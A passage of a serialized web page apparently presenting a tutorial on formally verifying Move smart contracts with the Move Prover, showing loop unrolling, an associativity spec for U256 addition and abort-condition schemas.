{\n",[14073],{"type":26,"tag":130,"props":14074,"children":14075},{"__ignoreMap":7},[14076,14087,14098,14133,14156,14239,14246,14269],{"type":26,"tag":137,"props":14077,"children":14078},{"class":5559,"line":5560},[14079,14083],{"type":26,"tag":137,"props":14080,"children":14081},{"style":5610},[14082],{"type":32,"value":13671},{"type":26,"tag":137,"props":14084,"children":14085},{"style":5601},[14086],{"type":32,"value":11118},{"type":26,"tag":137,"props":14088,"children":14089},{"class":5559,"line":5412},[14090,14094],{"type":26,"tag":137,"props":14091,"children":14092},{"style":5584},[14093],{"type":32,"value":11515},{"type":26,"tag":137,"props":14095,"children":14096},{"style":5601},[14097],{"type":32,"value":5875},{"type":26,"tag":137,"props":14099,"children":14100},{"class":5559,"line":5417},[14101,14105,14109,14113,14117,14121,14125,14129],{"type":26,"tag":137,"props":14102,"children":14103},{"style":5584},[14104],{"type":32,"value":13694},{"type":26,"tag":137,"props":14106,"children":14107},{"style":5682},[14108],{"type":32,"value":11143},{"type":26,"tag":137,"props":14110,"children":14111},{"style":5601},[14112],{"type":32,"value":165},{"type":26,"tag":137,"props":14114,"children":14115},{"style":5584},[14116],{"type":32,"value":11152},{"type":26,"tag":137,"props":14118,"children":14119},{"style":5601},[14120],{"type":32,"value":5671},{"type":26,"tag":137,"props":14122,"children":14123},{"style":5590},[14124],{"type":32,"value":11161},{"type":26,"tag":137,"props":14126,"children":14127},{"style":5584},[14128],{"type":32,"value":5988},{"type":26,"tag":137,"props":14130,"children":14131},{"style":5601},[14132],{"type":32,"value":5604},{"type":26,"tag":137,"props":14134,"children":14135},{"class":5559,"line":5642},[14136,14140,14144,14148,14152],{"type":26,"tag":137,"props":14137,"children":14138},{"style":5584},[14139],{"type":32,"value":13694},{"type":26,"tag":137,"props":14141,"children":14142},{"style":5584},[14143],{"type":32,"value":5988},{"type":26,"tag":137,"props":14145,"children":14146},{"style":5590},[14147],{"type":32,"value":10782},{"type":26,"tag":137,"props":14149,"children":14150},{"style":5584},[14151],{"type":32,"value":11072},{"type":26,"tag":137,"props":14153,"children":14154},{"style":5601},[14155],{"type":32,"value":5604},{"type":26,"tag":137,"props":14157,"children":14158},{"class":5559,"line":5745},[14159,14163,14167,14171,14175,14179,14183,14187,14191,14195,14199,14203,14207,14211,14215,14219,14223,14227,14231,14235],{"type":26,"tag":137,"props":14160,"children":14161},{"style":5584},[14162],{"type":32,"value":13694},{"type":26,"tag":137,"props":14164,"children":14165},{"style":5584},[14166],{"type":32,"value":11204},{"type":26,"tag":137,"props":14168,"children":14169},{"style":5584},[14170],{"type":32,"value":11209},{"type":26,"tag":137,"props":14172,"children":14173},{"style":5573},[14174],{"type":32,"value":5623},{"type":26,"tag":137,"props":14176,"children":14177},{"style":5626},[14178],{"type":32,"value":5629},{"type":26,"tag":137,"props":14180,"children":14181},{"style":5590},[14182],{"type":32,"value":5634},{"type":26,"tag":137,"props":14184,"children":14185},{"style":5584},[14186],{"type":32,"value":506},{"type":26,"tag":137,"props":14188,"children":14189},{"style":5590},[14190],{"type":32,"value":7072},{"type":26,"tag":137,"props":14192,"children":14193},{"style":5584},[14194],{"type":32,"value":11007},{"type":26,"tag":137,"props":14196,"children":14197},{"style":5601},[14198],{"type":32,"value":3016},{"type":26,"tag":137,"props":14200,"children":14201},{"style":5584},[14202],{"type":32,"value":11242},{"type":26,"tag":137,"props":14204,"children":14205},{"style":5601},[14206],{"type":32,"value":11247},{"type":26,"tag":137,"props":14208,"children":14209},{"style":5590},[14210],{"type":32,"value":11161},{"type":26,"tag":137,"props":14212,"children":14213},{"style":5584},[14214],{"type":32,"value":11256},{"type":26,"tag":137,"props":14216,"children":14217},{"style":5601},[14218],{"type":32,"value":3016},{"type":26,"tag":137,"props":14220,"children":14221},{"style":5584},[14222],{"type":32,"value":11242},{"type":26,"tag":137,"props":14224,"children":14225},{"style":5601},[14226],{"type":32,"value":11247},{"type":26,"tag":137,"props":14228,"children":14229},{"style":5590},[14230],{"type":32,"value":7152},{"type":26,"tag":137,"props":14232,"children":14233},{"style":5584},[14234],{"type":32,"value":11072},{"type":26,"tag":137,"props":14236,"children":14237},{"style":5601},[14238],{"type":32,"value":5604},{"type":26,"tag":137,"props":14240,"children":14241},{"class":5559,"line":5850},[14242],{"type":26,"tag":137,"props":14243,"children":14244},{"style":5601},[14245],{"type":32,"value":11507},{"type":26,"tag":137,"props":14247,"children":14248},{"class":5559,"line":5878},[14249,14253,14257,14261,14265],{"type":26,"tag":137,"props":14250,"children":14251},{"style":5601},[14252],{"type":32,"value":13843},{"type":26,"tag":137,"props":14254,"children":14255},{"style":5584},[14256],{"type":32,"value":506},{"type":26,"tag":137,"props":14258,"children":14259},{"style":5590},[14260],{"type":32,"value":11305},{"type":26,"tag":137,"props":14262,"children":14263},{"style":5584},[14264],{"type":32,"value":11072},{"type":26,"tag":137,"props":14266,"children":14267},{"style":5601},[14268],{"type":32,"value":5742},{"type":26,"tag":137,"props":14270,"children":14271},{"class":5559,"line":5891},[14272],{"type":26,"tag":137,"props":14273,"children":14274},{"style":5601},[14275],{"type":32,"value":13867},{"type":26,"tag":35,"props":14277,"children":14278},{},[14279],{"type":32,"value":14280},"Loop invariants are often difficult to write, especially for nontrivial loop bodies.",{"type":26,"tag":35,"props":14282,"children":14283},{},[14284,14286,14291],{"type":32,"value":14285},"The second solution to dealing with loops is to unroll the loop. This technique works in this particular situation because, as we can observe, the loop within the ",{"type":26,"tag":130,"props":14287,"children":14289},{"className":14288},[],[14290],{"type":32,"value":12227},{"type":32,"value":14292}," function will always iterate exactly 4 times:",{"type":26,"tag":5512,"props":14294,"children":14296},{"code":14295,"language":5551,"meta":7,"className":5552,"style":7},"/// Total words in `U256` (64 * 4 = 256).\nconst WORDS: u64 = 4;\n\n[...]\n\nlet i = 0;\nwhile (i \u003C WORDS) {\n    let a1 = get(&a, i);\n    let b1 = get(&b, i);\n\n[...]\n",[14297],{"type":26,"tag":130,"props":14298,"children":14299},{"__ignoreMap":7},[14300,14308,14341,14348,14364,14371,14395,14419,14464,14508,14515],{"type":26,"tag":137,"props":14301,"children":14302},{"class":5559,"line":5560},[14303],{"type":26,"tag":137,"props":14304,"children":14305},{"style":5564},[14306],{"type":32,"value":14307},"/// Total words in `U256` (64 * 4 = 256).\n",{"type":26,"tag":137,"props":14309,"children":14310},{"class":5559,"line":5412},[14311,14315,14320,14324,14328,14332,14337],{"type":26,"tag":137,"props":14312,"children":14313},{"style":5573},[14314],{"type":32,"value":12244},{"type":26,"tag":137,"props":14316,"children":14317},{"style":5601},[14318],{"type":32,"value":14319}," WORDS",{"type":26,"tag":137,"props":14321,"children":14322},{"style":5590},[14323],{"type":32,"value":7072},{"type":26,"tag":137,"props":14325,"children":14326},{"style":6009},[14327],{"type":32,"value":8445},{"type":26,"tag":137,"props":14329,"children":14330},{"style":5590},[14331],{"type":32,"value":5593},{"type":26,"tag":137,"props":14333,"children":14334},{"style":5626},[14335],{"type":32,"value":14336}," 4",{"type":26,"tag":137,"props":14338,"children":14339},{"style":5601},[14340],{"type":32,"value":5604},{"type":26,"tag":137,"props":14342,"children":14343},{"class":5559,"line":5417},[14344],{"type":26,"tag":137,"props":14345,"children":14346},{"emptyLinePlaceholder":18},[14347],{"type":32,"value":6276},{"type":26,"tag":137,"props":14349,"children":14350},{"class":5559,"line":5642},[14351,14355,14359],{"type":26,"tag":137,"props":14352,"children":14353},{"style":5601},[14354],{"type":32,"value":3016},{"type":26,"tag":137,"props":14356,"children":14357},{"style":5590},[14358],{"type":32,"value":12180},{"type":26,"tag":137,"props":14360,"children":14361},{"style":5601},[14362],{"type":32,"value":14363},"]\n",{"type":26,"tag":137,"props":14365,"children":14366},{"class":5559,"line":5745},[14367],{"type":26,"tag":137,"props":14368,"children":14369},{"emptyLinePlaceholder":18},[14370],{"type":32,"value":6276},{"type":26,"tag":137,"props":14372,"children":14373},{"class":5559,"line":5850},[14374,14379,14383,14387,14391],{"type":26,"tag":137,"props":14375,"children":14376},{"style":5573},[14377],{"type":32,"value":14378},"let",{"type":26,"tag":137,"props":14380,"children":14381},{"style":5584},[14382],{"type":32,"value":5988},{"type":26,"tag":137,"props":14384,"children":14385},{"style":5590},[14386],{"type":32,"value":5593},{"type":26,"tag":137,"props":14388,"children":14389},{"style":5626},[14390],{"type":32,"value":5629},{"type":26,"tag":137,"props":14392,"children":14393},{"style":5601},[14394],{"type":32,"value":5604},{"type":26,"tag":137,"props":14396,"children":14397},{"class":5559,"line":5878},[14398,14402,14406,14410,14414],{"type":26,"tag":137,"props":14399,"children":14400},{"style":5610},[14401],{"type":32,"value":14052},{"type":26,"tag":137,"props":14403,"children":14404},{"style":5601},[14405],{"type":32,"value":4625},{"type":26,"tag":137,"props":14407,"children":14408},{"style":5584},[14409],{"type":32,"value":506},{"type":26,"tag":137,"props":14411,"children":14412},{"style":5590},[14413],{"type":32,"value":11305},{"type":26,"tag":137,"props":14415,"children":14416},{"style":5601},[14417],{"type":32,"value":14418}," WORDS) {\n",{"type":26,"tag":137,"props":14420,"children":14421},{"class":5559,"line":5891},[14422,14426,14431,14435,14440,14444,14448,14452,14456,14460],{"type":26,"tag":137,"props":14423,"children":14424},{"style":5573},[14425],{"type":32,"value":5576},{"type":26,"tag":137,"props":14427,"children":14428},{"style":5584},[14429],{"type":32,"value":14430}," a1",{"type":26,"tag":137,"props":14432,"children":14433},{"style":5590},[14434],{"type":32,"value":5593},{"type":26,"tag":137,"props":14436,"children":14437},{"style":5682},[14438],{"type":32,"value":14439}," get",{"type":26,"tag":137,"props":14441,"children":14442},{"style":5601},[14443],{"type":32,"value":165},{"type":26,"tag":137,"props":14445,"children":14446},{"style":5590},[14447],{"type":32,"value":5694},{"type":26,"tag":137,"props":14449,"children":14450},{"style":5584},[14451],{"type":32,"value":41},{"type":26,"tag":137,"props":14453,"children":14454},{"style":5601},[14455],{"type":32,"value":1108},{"type":26,"tag":137,"props":14457,"children":14458},{"style":5584},[14459],{"type":32,"value":506},{"type":26,"tag":137,"props":14461,"children":14462},{"style":5601},[14463],{"type":32,"value":6430},{"type":26,"tag":137,"props":14465,"children":14466},{"class":5559,"line":5909},[14467,14471,14476,14480,14484,14488,14492,14496,14500,14504],{"type":26,"tag":137,"props":14468,"children":14469},{"style":5573},[14470],{"type":32,"value":5576},{"type":26,"tag":137,"props":14472,"children":14473},{"style":5584},[14474],{"type":32,"value":14475}," b1",{"type":26,"tag":137,"props":14477,"children":14478},{"style":5590},[14479],{"type":32,"value":5593},{"type":26,"tag":137,"props":14481,"children":14482},{"style":5682},[14483],{"type":32,"value":14439},{"type":26,"tag":137,"props":14485,"children":14486},{"style":5601},[14487],{"type":32,"value":165},{"type":26,"tag":137,"props":14489,"children":14490},{"style":5590},[14491],{"type":32,"value":5694},{"type":26,"tag":137,"props":14493,"children":14494},{"style":5584},[14495],{"type":32,"value":2832},{"type":26,"tag":137,"props":14497,"children":14498},{"style":5601},[14499],{"type":32,"value":1108},{"type":26,"tag":137,"props":14501,"children":14502},{"style":5584},[14503],{"type":32,"value":506},{"type":26,"tag":137,"props":14505,"children":14506},{"style":5601},[14507],{"type":32,"value":6430},{"type":26,"tag":137,"props":14509,"children":14510},{"class":5559,"line":5930},[14511],{"type":26,"tag":137,"props":14512,"children":14513},{"emptyLinePlaceholder":18},[14514],{"type":32,"value":6276},{"type":26,"tag":137,"props":14516,"children":14517},{"class":5559,"line":5939},[14518,14522,14526],{"type":26,"tag":137,"props":14519,"children":14520},{"style":5601},[14521],{"type":32,"value":3016},{"type":26,"tag":137,"props":14523,"children":14524},{"style":5590},[14525],{"type":32,"value":12180},{"type":26,"tag":137,"props":14527,"children":14528},{"style":5601},[14529],{"type":32,"value":14363},{"type":26,"tag":35,"props":14531,"children":14532},{},[14533],{"type":32,"value":14534},"Unrolling the function and running again the Move Prover will print out a \"Success\" message!",{"type":26,"tag":5512,"props":14536,"children":14538},{"code":14537},"SUCCESS proving 1 modules from package `u256` in 9.685s\n{\n    \"Result\": \"Success\"\n}\n",[14539],{"type":26,"tag":130,"props":14540,"children":14541},{"__ignoreMap":7},[14542],{"type":32,"value":14537},{"type":26,"tag":35,"props":14544,"children":14545},{},[14546,14548,14553,14554,14560],{"type":32,"value":14547},"For the ",{"type":26,"tag":84,"props":14549,"children":14550},{},[14551],{"type":32,"value":14552},"Associative Property",{"type":32,"value":4625},{"type":26,"tag":130,"props":14555,"children":14557},{"className":14556},[],[14558],{"type":32,"value":14559},"a+(b+c) = (a+b)+c",{"type":32,"value":14561},") to be true, changing the grouping of addends should not change the sum. To verify this, we will first implement a function which simulates this property:",{"type":26,"tag":5512,"props":14563,"children":14565},{"code":14564,"language":5551,"meta":7,"className":5552,"style":7},"fun add_assoc_property(a: U256, b: U256, c: U256): bool {\n    let result_1 = add(b, c);\n    let result_11 = add(a, result_1);\n    let result_2 = add(a, b);\n    let result_22 = add(c, result_2);\n\n    let cmp = compare(&result_11, &result_22);\n    if ( cmp == EQUAL ) true else false\n}\n",[14566],{"type":26,"tag":130,"props":14567,"children":14568},{"__ignoreMap":7},[14569,14646,14685,14726,14765,14806,14813,14863,14903],{"type":26,"tag":137,"props":14570,"children":14571},{"class":5559,"line":5560},[14572,14576,14581,14585,14589,14593,14597,14601,14605,14609,14613,14617,14621,14625,14629,14633,14637,14642],{"type":26,"tag":137,"props":14573,"children":14574},{"style":5584},[14575],{"type":32,"value":9691},{"type":26,"tag":137,"props":14577,"children":14578},{"style":5682},[14579],{"type":32,"value":14580}," add_assoc_property",{"type":26,"tag":137,"props":14582,"children":14583},{"style":5601},[14584],{"type":32,"value":165},{"type":26,"tag":137,"props":14586,"children":14587},{"style":5584},[14588],{"type":32,"value":41},{"type":26,"tag":137,"props":14590,"children":14591},{"style":5590},[14592],{"type":32,"value":7072},{"type":26,"tag":137,"props":14594,"children":14595},{"style":6009},[14596],{"type":32,"value":7312},{"type":26,"tag":137,"props":14598,"children":14599},{"style":5601},[14600],{"type":32,"value":1108},{"type":26,"tag":137,"props":14602,"children":14603},{"style":5584},[14604],{"type":32,"value":2832},{"type":26,"tag":137,"props":14606,"children":14607},{"style":5590},[14608],{"type":32,"value":7072},{"type":26,"tag":137,"props":14610,"children":14611},{"style":6009},[14612],{"type":32,"value":7312},{"type":26,"tag":137,"props":14614,"children":14615},{"style":5601},[14616],{"type":32,"value":1108},{"type":26,"tag":137,"props":14618,"children":14619},{"style":5584},[14620],{"type":32,"value":4326},{"type":26,"tag":137,"props":14622,"children":14623},{"style":5590},[14624],{"type":32,"value":7072},{"type":26,"tag":137,"props":14626,"children":14627},{"style":6009},[14628],{"type":32,"value":7312},{"type":26,"tag":137,"props":14630,"children":14631},{"style":5601},[14632],{"type":32,"value":200},{"type":26,"tag":137,"props":14634,"children":14635},{"style":5590},[14636],{"type":32,"value":7072},{"type":26,"tag":137,"props":14638,"children":14639},{"style":6009},[14640],{"type":32,"value":14641}," bool",{"type":26,"tag":137,"props":14643,"children":14644},{"style":5601},[14645],{"type":32,"value":5875},{"type":26,"tag":137,"props":14647,"children":14648},{"class":5559,"line":5412},[14649,14653,14657,14661,14665,14669,14673,14677,14681],{"type":26,"tag":137,"props":14650,"children":14651},{"style":5573},[14652],{"type":32,"value":5576},{"type":26,"tag":137,"props":14654,"children":14655},{"style":5584},[14656],{"type":32,"value":10777},{"type":26,"tag":137,"props":14658,"children":14659},{"style":5590},[14660],{"type":32,"value":5593},{"type":26,"tag":137,"props":14662,"children":14663},{"style":5682},[14664],{"type":32,"value":12170},{"type":26,"tag":137,"props":14666,"children":14667},{"style":5601},[14668],{"type":32,"value":165},{"type":26,"tag":137,"props":14670,"children":14671},{"style":5584},[14672],{"type":32,"value":2832},{"type":26,"tag":137,"props":14674,"children":14675},{"style":5601},[14676],{"type":32,"value":1108},{"type":26,"tag":137,"props":14678,"children":14679},{"style":5584},[14680],{"type":32,"value":4326},{"type":26,"tag":137,"props":14682,"children":14683},{"style":5601},[14684],{"type":32,"value":6430},{"type":26,"tag":137,"props":14686,"children":14687},{"class":5559,"line":5417},[14688,14692,14697,14701,14705,14709,14713,14717,14722],{"type":26,"tag":137,"props":14689,"children":14690},{"style":5573},[14691],{"type":32,"value":5576},{"type":26,"tag":137,"props":14693,"children":14694},{"style":5584},[14695],{"type":32,"value":14696}," result_11",{"type":26,"tag":137,"props":14698,"children":14699},{"style":5590},[14700],{"type":32,"value":5593},{"type":26,"tag":137,"props":14702,"children":14703},{"style":5682},[14704],{"type":32,"value":12170},{"type":26,"tag":137,"props":14706,"children":14707},{"style":5601},[14708],{"type":32,"value":165},{"type":26,"tag":137,"props":14710,"children":14711},{"style":5584},[14712],{"type":32,"value":41},{"type":26,"tag":137,"props":14714,"children":14715},{"style":5601},[14716],{"type":32,"value":1108},{"type":26,"tag":137,"props":14718,"children":14719},{"style":5584},[14720],{"type":32,"value":14721},"result_1",{"type":26,"tag":137,"props":14723,"children":14724},{"style":5601},[14725],{"type":32,"value":6430},{"type":26,"tag":137,"props":14727,"children":14728},{"class":5559,"line":5642},[14729,14733,14737,14741,14745,14749,14753,14757,14761],{"type":26,"tag":137,"props":14730,"children":14731},{"style":5573},[14732],{"type":32,"value":5576},{"type":26,"tag":137,"props":14734,"children":14735},{"style":5584},[14736],{"type":32,"value":10803},{"type":26,"tag":137,"props":14738,"children":14739},{"style":5590},[14740],{"type":32,"value":5593},{"type":26,"tag":137,"props":14742,"children":14743},{"style":5682},[14744],{"type":32,"value":12170},{"type":26,"tag":137,"props":14746,"children":14747},{"style":5601},[14748],{"type":32,"value":165},{"type":26,"tag":137,"props":14750,"children":14751},{"style":5584},[14752],{"type":32,"value":41},{"type":26,"tag":137,"props":14754,"children":14755},{"style":5601},[14756],{"type":32,"value":1108},{"type":26,"tag":137,"props":14758,"children":14759},{"style":5584},[14760],{"type":32,"value":2832},{"type":26,"tag":137,"props":14762,"children":14763},{"style":5601},[14764],{"type":32,"value":6430},{"type":26,"tag":137,"props":14766,"children":14767},{"class":5559,"line":5745},[14768,14772,14777,14781,14785,14789,14793,14797,14802],{"type":26,"tag":137,"props":14769,"children":14770},{"style":5573},[14771],{"type":32,"value":5576},{"type":26,"tag":137,"props":14773,"children":14774},{"style":5584},[14775],{"type":32,"value":14776}," result_22",{"type":26,"tag":137,"props":14778,"children":14779},{"style":5590},[14780],{"type":32,"value":5593},{"type":26,"tag":137,"props":14782,"children":14783},{"style":5682},[14784],{"type":32,"value":12170},{"type":26,"tag":137,"props":14786,"children":14787},{"style":5601},[14788],{"type":32,"value":165},{"type":26,"tag":137,"props":14790,"children":14791},{"style":5584},[14792],{"type":32,"value":4326},{"type":26,"tag":137,"props":14794,"children":14795},{"style":5601},[14796],{"type":32,"value":1108},{"type":26,"tag":137,"props":14798,"children":14799},{"style":5584},[14800],{"type":32,"value":14801},"result_2",{"type":26,"tag":137,"props":14803,"children":14804},{"style":5601},[14805],{"type":32,"value":6430},{"type":26,"tag":137,"props":14807,"children":14808},{"class":5559,"line":5850},[14809],{"type":26,"tag":137,"props":14810,"children":14811},{"emptyLinePlaceholder":18},[14812],{"type":32,"value":6276},{"type":26,"tag":137,"props":14814,"children":14815},{"class":5559,"line":5878},[14816,14820,14824,14828,14833,14837,14841,14846,14850,14854,14859],{"type":26,"tag":137,"props":14817,"children":14818},{"style":5573},[14819],{"type":32,"value":5576},{"type":26,"tag":137,"props":14821,"children":14822},{"style":5584},[14823],{"type":32,"value":10445},{"type":26,"tag":137,"props":14825,"children":14826},{"style":5590},[14827],{"type":32,"value":5593},{"type":26,"tag":137,"props":14829,"children":14830},{"style":5682},[14831],{"type":32,"value":14832}," compare",{"type":26,"tag":137,"props":14834,"children":14835},{"style":5601},[14836],{"type":32,"value":165},{"type":26,"tag":137,"props":14838,"children":14839},{"style":5590},[14840],{"type":32,"value":5694},{"type":26,"tag":137,"props":14842,"children":14843},{"style":5584},[14844],{"type":32,"value":14845},"result_11",{"type":26,"tag":137,"props":14847,"children":14848},{"style":5601},[14849],{"type":32,"value":1108},{"type":26,"tag":137,"props":14851,"children":14852},{"style":5590},[14853],{"type":32,"value":5694},{"type":26,"tag":137,"props":14855,"children":14856},{"style":5584},[14857],{"type":32,"value":14858},"result_22",{"type":26,"tag":137,"props":14860,"children":14861},{"style":5601},[14862],{"type":32,"value":6430},{"type":26,"tag":137,"props":14864,"children":14865},{"class":5559,"line":5891},[14866,14871,14876,14880,14884,14889,14893,14898],{"type":26,"tag":137,"props":14867,"children":14868},{"style":5610},[14869],{"type":32,"value":14870},"    if",{"type":26,"tag":137,"props":14872,"children":14873},{"style":5601},[14874],{"type":32,"value":14875}," ( ",{"type":26,"tag":137,"props":14877,"children":14878},{"style":5584},[14879],{"type":32,"value":10510},{"type":26,"tag":137,"props":14881,"children":14882},{"style":5590},[14883],{"type":32,"value":5866},{"type":26,"tag":137,"props":14885,"children":14886},{"style":5601},[14887],{"type":32,"value":14888}," EQUAL ) ",{"type":26,"tag":137,"props":14890,"children":14891},{"style":5573},[14892],{"type":32,"value":146},{"type":26,"tag":137,"props":14894,"children":14895},{"style":5610},[14896],{"type":32,"value":14897}," else",{"type":26,"tag":137,"props":14899,"children":14900},{"style":5573},[14901],{"type":32,"value":14902}," false\n",{"type":26,"tag":137,"props":14904,"children":14905},{"class":5559,"line":5909},[14906],{"type":26,"tag":137,"props":14907,"children":14908},{"style":5601},[14909],{"type":32,"value":6507},{"type":26,"tag":35,"props":14911,"children":14912},{},[14913],{"type":32,"value":14914},"Lastly, we want to create a spec block which aborts if the sum overflows, and ensures that the result of the function is true:",{"type":26,"tag":5512,"props":14916,"children":14918},{"code":14917,"language":5551,"meta":7,"className":5552,"style":7},"spec add_assoc_property {\n    aborts_if (value_of_U256(a) + value_of_U256(b)) + value_of_U256(c) >= P64 * P64 * P64 * P64;\n    ensures result == true;\n}\n",[14919],{"type":26,"tag":130,"props":14920,"children":14921},{"__ignoreMap":7},[14922,14937,15041,15065],{"type":26,"tag":137,"props":14923,"children":14924},{"class":5559,"line":5560},[14925,14929,14933],{"type":26,"tag":137,"props":14926,"children":14927},{"style":5584},[14928],{"type":32,"value":10860},{"type":26,"tag":137,"props":14930,"children":14931},{"style":5584},[14932],{"type":32,"value":14580},{"type":26,"tag":137,"props":14934,"children":14935},{"style":5601},[14936],{"type":32,"value":5875},{"type":26,"tag":137,"props":14938,"children":14939},{"class":5559,"line":5412},[14940,14944,14948,14953,14957,14961,14965,14969,14973,14977,14981,14985,14989,14993,14997,15001,15005,15009,15013,15017,15021,15025,15029,15033,15037],{"type":26,"tag":137,"props":14941,"children":14942},{"style":5584},[14943],{"type":32,"value":12492},{"type":26,"tag":137,"props":14945,"children":14946},{"style":5601},[14947],{"type":32,"value":4625},{"type":26,"tag":137,"props":14949,"children":14950},{"style":5682},[14951],{"type":32,"value":14952},"value_of_U256",{"type":26,"tag":137,"props":14954,"children":14955},{"style":5601},[14956],{"type":32,"value":165},{"type":26,"tag":137,"props":14958,"children":14959},{"style":5584},[14960],{"type":32,"value":41},{"type":26,"tag":137,"props":14962,"children":14963},{"style":5601},[14964],{"type":32,"value":5671},{"type":26,"tag":137,"props":14966,"children":14967},{"style":5590},[14968],{"type":32,"value":356},{"type":26,"tag":137,"props":14970,"children":14971},{"style":5682},[14972],{"type":32,"value":12293},{"type":26,"tag":137,"props":14974,"children":14975},{"style":5601},[14976],{"type":32,"value":165},{"type":26,"tag":137,"props":14978,"children":14979},{"style":5584},[14980],{"type":32,"value":2832},{"type":26,"tag":137,"props":14982,"children":14983},{"style":5601},[14984],{"type":32,"value":11423},{"type":26,"tag":137,"props":14986,"children":14987},{"style":5590},[14988],{"type":32,"value":356},{"type":26,"tag":137,"props":14990,"children":14991},{"style":5682},[14992],{"type":32,"value":12293},{"type":26,"tag":137,"props":14994,"children":14995},{"style":5601},[14996],{"type":32,"value":165},{"type":26,"tag":137,"props":14998,"children":14999},{"style":5584},[15000],{"type":32,"value":4326},{"type":26,"tag":137,"props":15002,"children":15003},{"style":5601},[15004],{"type":32,"value":5671},{"type":26,"tag":137,"props":15006,"children":15007},{"style":5590},[15008],{"type":32,"value":12533},{"type":26,"tag":137,"props":15010,"children":15011},{"style":6009},[15012],{"type":32,"value":12249},{"type":26,"tag":137,"props":15014,"children":15015},{"style":5590},[15016],{"type":32,"value":12406},{"type":26,"tag":137,"props":15018,"children":15019},{"style":6009},[15020],{"type":32,"value":12249},{"type":26,"tag":137,"props":15022,"children":15023},{"style":5590},[15024],{"type":32,"value":12406},{"type":26,"tag":137,"props":15026,"children":15027},{"style":6009},[15028],{"type":32,"value":12249},{"type":26,"tag":137,"props":15030,"children":15031},{"style":5590},[15032],{"type":32,"value":12406},{"type":26,"tag":137,"props":15034,"children":15035},{"style":6009},[15036],{"type":32,"value":12249},{"type":26,"tag":137,"props":15038,"children":15039},{"style":5601},[15040],{"type":32,"value":5604},{"type":26,"tag":137,"props":15042,"children":15043},{"class":5559,"line":5417},[15044,15048,15052,15056,15061],{"type":26,"tag":137,"props":15045,"children":15046},{"style":5584},[15047],{"type":32,"value":12790},{"type":26,"tag":137,"props":15049,"children":15050},{"style":5584},[15051],{"type":32,"value":11748},{"type":26,"tag":137,"props":15053,"children":15054},{"style":5590},[15055],{"type":32,"value":5866},{"type":26,"tag":137,"props":15057,"children":15058},{"style":5573},[15059],{"type":32,"value":15060}," true",{"type":26,"tag":137,"props":15062,"children":15063},{"style":5601},[15064],{"type":32,"value":5604},{"type":26,"tag":137,"props":15066,"children":15067},{"class":5559,"line":5642},[15068],{"type":26,"tag":137,"props":15069,"children":15070},{"style":5601},[15071],{"type":32,"value":6507},{"type":26,"tag":35,"props":15073,"children":15074},{},[15075],{"type":32,"value":15076},"Running move prover with the new specifications, we can confirm that there are no verification errors:",{"type":26,"tag":5512,"props":15078,"children":15079},{"code":14537},[15080],{"type":26,"tag":130,"props":15081,"children":15082},{"__ignoreMap":7},[15083],{"type":32,"value":14537},{"type":26,"tag":35,"props":15085,"children":15086},{},[15087,15089,15096],{"type":32,"value":15088},"For a more complete document detailing Move Prover syntax, we recommend referring to ",{"type":26,"tag":41,"props":15090,"children":15093},{"href":15091,"rel":15092},"https://github.com/move-language/move/blob/main/language/move-prover/doc/user/spec-lang.md",[45],[15094],{"type":32,"value":15095},"spec-lang.md",{"type":32,"value":15097}," in the Move Repository.",{"type":26,"tag":92,"props":15099,"children":15101},{"id":15100},"use-cases",[15102],{"type":32,"value":15103},"Use Cases",{"type":26,"tag":35,"props":15105,"children":15106},{},[15107],{"type":32,"value":15108},"Formal verification can prove that a smart contract satisfies the given requirements for all possible cases without even running the contract. The hard part is coming up with the specifications.",{"type":26,"tag":35,"props":15110,"children":15111},{},[15112],{"type":32,"value":15113},"Here, we hope to explore some practical examples of possible verification ideas.",{"type":26,"tag":118,"props":15115,"children":15117},{"id":15116},"error-conditions",[15118],{"type":32,"value":15119},"Error Conditions",{"type":26,"tag":35,"props":15121,"children":15122},{},[15123,15125,15131],{"type":32,"value":15124},"Taking an example from ",{"type":26,"tag":130,"props":15126,"children":15128},{"className":15127},[],[15129],{"type":32,"value":15130},"std::fixed_point32",{"type":32,"value":15132},", it's often useful to explicitly define when a function might abort. For example, arithmetic operations with fixed point numbers should only error if they overflow.",{"type":26,"tag":5512,"props":15134,"children":15136},{"code":15135,"language":5551,"meta":7,"className":5552,"style":7},"      spec schema MultiplyAbortsIf {\n          val: num;\n          multiplier: FixedPoint32;\n          aborts_if spec_multiply_u64(val, multiplier) > MAX_U64 with EMULTIPLICATION;\n      }\n      spec fun spec_multiply_u64(val: num, multiplier: FixedPoint32): num {\n          (val * multiplier.value) >> 32\n      }\n",[15137],{"type":26,"tag":130,"props":15138,"children":15139},{"__ignoreMap":7},[15140,15161,15181,15202,15248,15256,15319,15358],{"type":26,"tag":137,"props":15141,"children":15142},{"class":5559,"line":5560},[15143,15147,15152,15157],{"type":26,"tag":137,"props":15144,"children":15145},{"style":5584},[15146],{"type":32,"value":11515},{"type":26,"tag":137,"props":15148,"children":15149},{"style":5584},[15150],{"type":32,"value":15151}," schema",{"type":26,"tag":137,"props":15153,"children":15154},{"style":6009},[15155],{"type":32,"value":15156}," MultiplyAbortsIf",{"type":26,"tag":137,"props":15158,"children":15159},{"style":5601},[15160],{"type":32,"value":5875},{"type":26,"tag":137,"props":15162,"children":15163},{"class":5559,"line":5412},[15164,15169,15173,15177],{"type":26,"tag":137,"props":15165,"children":15166},{"style":5584},[15167],{"type":32,"value":15168},"          val",{"type":26,"tag":137,"props":15170,"children":15171},{"style":5590},[15172],{"type":32,"value":7072},{"type":26,"tag":137,"props":15174,"children":15175},{"style":5584},[15176],{"type":32,"value":12322},{"type":26,"tag":137,"props":15178,"children":15179},{"style":5601},[15180],{"type":32,"value":5604},{"type":26,"tag":137,"props":15182,"children":15183},{"class":5559,"line":5417},[15184,15189,15193,15198],{"type":26,"tag":137,"props":15185,"children":15186},{"style":5584},[15187],{"type":32,"value":15188},"          multiplier",{"type":26,"tag":137,"props":15190,"children":15191},{"style":5590},[15192],{"type":32,"value":7072},{"type":26,"tag":137,"props":15194,"children":15195},{"style":6009},[15196],{"type":32,"value":15197}," FixedPoint32",{"type":26,"tag":137,"props":15199,"children":15200},{"style":5601},[15201],{"type":32,"value":5604},{"type":26,"tag":137,"props":15203,"children":15204},{"class":5559,"line":5642},[15205,15210,15215,15219,15224,15228,15233,15238,15243],{"type":26,"tag":137,"props":15206,"children":15207},{"style":5584},[15208],{"type":32,"value":15209},"          aborts_if",{"type":26,"tag":137,"props":15211,"children":15212},{"style":5682},[15213],{"type":32,"value":15214}," 